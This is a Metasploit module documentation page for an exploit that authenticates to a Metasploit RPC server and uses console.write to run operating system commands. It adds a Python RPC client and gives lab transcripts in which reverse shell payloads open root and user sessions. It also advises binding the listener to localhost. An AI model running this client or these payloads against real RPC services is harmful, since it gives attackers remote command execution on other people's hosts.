
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/misc/msf_rpc_console.md

Description

This module connects to a specified Metasploit RPC server and uses the console.write procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
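The exchange the description refers to, written out as an added example that is not part of the module or of this page: a client that speaks the Metasploit RPC wire format (MessagePack arrays of the form [method, args...] POSTed to /api/ with content type binary/message-pack) and walks the same auth.login, console.create, console.write, console.read sequence the module uses. A small hand-written MessagePack codec replaces the msgpack library so the file runs offline; the server stand-in, its token value and its reply contents are constructed to match the documented reply shapes, not captured from a real msfrpcd, and the host and port passed to https_transport are assumptions for a lab target.

```python
"""Added example, not module code: the MessagePack-over-HTTP calls that
msf_rpc_console relies on, with a small codec so everything runs offline."""
import http.client
import ssl
import struct

class MsfRpcError(Exception):
    pass

def pack(obj):
    # Encode the subset of MessagePack that the MSF RPC API actually exchanges.
    if obj is None or isinstance(obj, bool):
        return {None: b"\xc0", False: b"\xc2", True: b"\xc3"}[obj]
    if isinstance(obj, int) and 0 <= obj <= 0xFFFFFFFF:
        return bytes([obj]) if obj <= 0x7F else b"\xce" + struct.pack(">I", obj)
    if isinstance(obj, str):
        raw = obj.encode("utf-8")
        head = bytes([0xA0 | len(raw)]) if len(raw) < 32 else b"\xdb" + struct.pack(">I", len(raw))
        return head + raw
    if isinstance(obj, list) and len(obj) < 16:
        return bytes([0x90 | len(obj)]) + b"".join(pack(x) for x in obj)
    if isinstance(obj, dict) and len(obj) < 16:
        return bytes([0x80 | len(obj)]) + b"".join(pack(k) + pack(v) for k, v in obj.items())
    raise TypeError(f"unsupported value {obj!r}")

def _decode(buf, i):
    b, i = buf[i], i + 1
    if b <= 0x7F:                                   # positive fixint
        return b, i
    if 0x80 <= b <= 0x9F:                           # fixmap (0x8x) / fixarray (0x9x)
        items = []
        for _ in range((b & 0x0F) * (2 if b <= 0x8F else 1)):
            item, i = _decode(buf, i)
            items.append(item)
        return (dict(zip(items[::2], items[1::2])) if b <= 0x8F else items), i
    if 0xA0 <= b <= 0xBF:                           # fixstr
        n = b & 0x1F
        return buf[i:i + n].decode("utf-8", "replace"), i + n
    if b in (0xC0, 0xC2, 0xC3):                     # nil / false / true
        return {0xC0: None, 0xC2: False, 0xC3: True}[b], i
    if b in (0xCC, 0xCD, 0xCE):                     # uint8 / uint16 / uint32
        w = 1 << (b - 0xCC)
        return int.from_bytes(buf[i:i + w], "big"), i + w
    if b in (0xD9, 0xDA, 0xDB):                     # str8 / str16 / str32
        w = 1 << (b - 0xD9)
        n = int.from_bytes(buf[i:i + w], "big")
        return buf[i + w:i + w + n].decode("utf-8", "replace"), i + w + n
    raise ValueError(f"unsupported MessagePack type byte 0x{b:02x}")

def unpack(buf):
    obj, used = _decode(buf, 0)
    if used != len(buf):
        raise ValueError("trailing bytes after MessagePack object")
    return obj

def encode_call(method, *args):
    return pack([method, *args])            # one RPC call is the array [method, *args]

def decode_reply(body):
    reply = unpack(body)
    if isinstance(reply, dict) and reply.get("error"):
        raise MsfRpcError(f"{reply.get('error_class')}: {reply.get('error_message')}")
    return reply

def https_transport(host, port):
    # POST raw MessagePack to /api/ over TLS. msfrpcd presents a self-signed
    # certificate, so verification is disabled here: lab use only.
    ctx = ssl.create_default_context()
    ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, context=ctx, timeout=10)
    def post(body):
        conn.request("POST", "/api/", body=body, headers={"Content-Type": "binary/message-pack"})
        return conn.getresponse().read()
    return post

def run_console_command(transport, user, password, command):
    """The module's sequence: auth.login -> console.create -> console.write ->
    console.read -> console.destroy. msfconsole passes a command it does not
    recognise to the OS shell, so console.write is command execution as the
    user running the RPC service."""
    login = decode_reply(transport(encode_call("auth.login", user, password)))
    if login.get("result") != "success":
        raise MsfRpcError("authentication failed")
    token = login["token"]
    cid = decode_reply(transport(encode_call("console.create", token)))["id"]
    decode_reply(transport(encode_call("console.write", token, cid, command + "\n")))
    output = decode_reply(transport(encode_call("console.read", token, cid)))["data"]
    decode_reply(transport(encode_call("console.destroy", token, cid)))
    return token, cid, output

TOKEN = "TEMPtoken0123456789abcdef"   # constructed; real tokens are random

def constructed_server(request_body):
    # Offline stand-in for msfrpcd: replies follow the documented reply shapes
    # of each procedure but are constructed here, not captured from a server.
    method, *args = unpack(request_body)
    err = lambda m: pack({"error": True, "error_class": "Msf::RPC::Exception", "error_message": m})
    if method == "auth.login":
        return pack({"result": "success", "token": TOKEN}) if args == ["msf", "abc123"] else err("Invalid User ID or Password")
    if not args or args[0] != TOKEN:
        return err("Invalid Authentication Token")
    replies = {
        "console.create": {"id": "0", "prompt": "msf > ", "busy": False},
        "console.write": {"wrote": len(args[2]) if len(args) > 2 else 0},
        "console.read": {"data": "[*] exec: id\n\nuid=0(root) gid=0(root) groups=0(root)\n", "prompt": "msf > ", "busy": False},
        "console.destroy": {"result": "success"},
    }
    return pack(replies[method]) if method in replies else err(f"Unknown method {method}")
```

Against a lab target the only change is the transport: run_console_command(https_transport("172.16.191.215", 55552), "msf", "abc123", "id") drives a real listener, while run_console_command(constructed_server, "msf", "abc123", "id") exercises the same code path offline. Every reply goes through decode_reply so a bad password or an expired token surfaces as MsfRpcError instead of a KeyError on a missing field.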

Vulnerable Application

Metasploit is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.

To start the RPC service, run msfrpcd -U msf -P abc123 (msfrpcd listens on port 55553 by default, so set RPORT accordingly); or run load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y from within msfconsole. Note that ServerHost=0.0.0.0 exposes the listener on every interface, and anyone who can reach it with valid credentials gets command execution on that host as the user running Metasploit; outside a lab, bind to 127.0.0.1 (ServerHost=127.0.0.1, or msfrpcd -a 127.0.0.1) and use a strong password.

This module has been tested successfully on:

  • Metasploit 4.15 on Kali 1.0.6

  • Metasploit 4.14 on Kali 2017.1

  • Metasploit 4.14 on Windows 7 SP1

Source and Installers:

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/multi/misc/msf_rpc_console

  3. Do: set RHOST [IP]

  4. Do: set RPORT [PORT] (default: 55552)

  5. Do: set USERNAME [USERNAME] (default: msf)

  6. Do: set PASSWORD [PASSWORD]

  7. Do: set LHOST [IP]

  8. Do: run

  9. You should get a session

Options

Username

The username for Metasploit RPC (default: msf).

Password

The password for the RPC user.

Scenarios

Ruby Target

```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 0
msf exploit(msf_rpc_console) > run

[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #0
[*] 172.16.191.166:55552 - Sending payload...
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400

whoami
win-sgbsd5tqutq\user
```

Windows CMD Target

```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 1
target => 1
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > run

[*] Started reverse SSL handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #1
[*] 172.16.191.166:55552 - Sending payload...
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400

Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\metasploit>whoami
win-sgbsd5tqutq\user
```

Unix CMD Target

```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
rhost => 172.16.191.215
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 2
target => 2
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(msf_rpc_console) > run

[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.215:55552 - Authenticated successfully
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
[*] 172.16.191.215:55552 - API version 1.0
[+] 172.16.191.215:55552 - Created console #0
[*] 172.16.191.215:55552 - Sending payload...
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400

id
uid=0(root) gid=0(root) groups=0(root)
```